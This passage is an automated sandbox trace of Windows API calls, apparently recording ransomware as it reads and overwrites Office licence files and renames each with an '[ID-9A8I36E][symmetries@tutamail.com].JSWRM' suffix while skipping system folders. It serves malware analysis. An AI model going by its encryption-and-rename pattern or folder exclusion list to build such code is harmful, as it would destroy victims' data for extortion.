HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0106.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.680] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19929) returned 1 [0106.680] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0106.680] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.683] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.683] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.683] CloseHandle (hObject=0x45c) returned 1 [0106.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0106.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0106.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0106.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.684] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.685] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cf531b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7cf531b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7e98d01, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Trial-pl.xrm-ms", cAlternateFileName="OUA3DC~1.XRM")) returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.685] lstrcmpiW (lpString1="OutlookR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0106.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.686] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11147) returned 1 [0106.686] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0106.686] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0106.688] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.688] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0106.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.689] CloseHandle (hObject=0x45c) returned 1 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0106.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0106.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.689] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.699] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7c82c0e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7c82c0e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7d8dc92, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Trial-ppd.xrm-ms", cAlternateFileName="OUB6BA~1.XRM")) returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.699] lstrcmpiW (lpString1="OutlookR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0106.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240fc0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0106.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.700] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20902) returned 1 [0106.700] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0106.700] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0106.703] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.703] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0106.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.703] CloseHandle (hObject=0x45c) returned 1 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0106.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0106.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.704] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0106.705] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7c82c0e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7c82c0e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7ee51d1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Trial-ul-oob.xrm-ms", cAlternateFileName="OU26D9~1.XRM")) returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.705] lstrcmpiW (lpString1="OutlookR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0106.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241128, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.705] WideCharToMultiByte (in: CodePage=0xfde9, 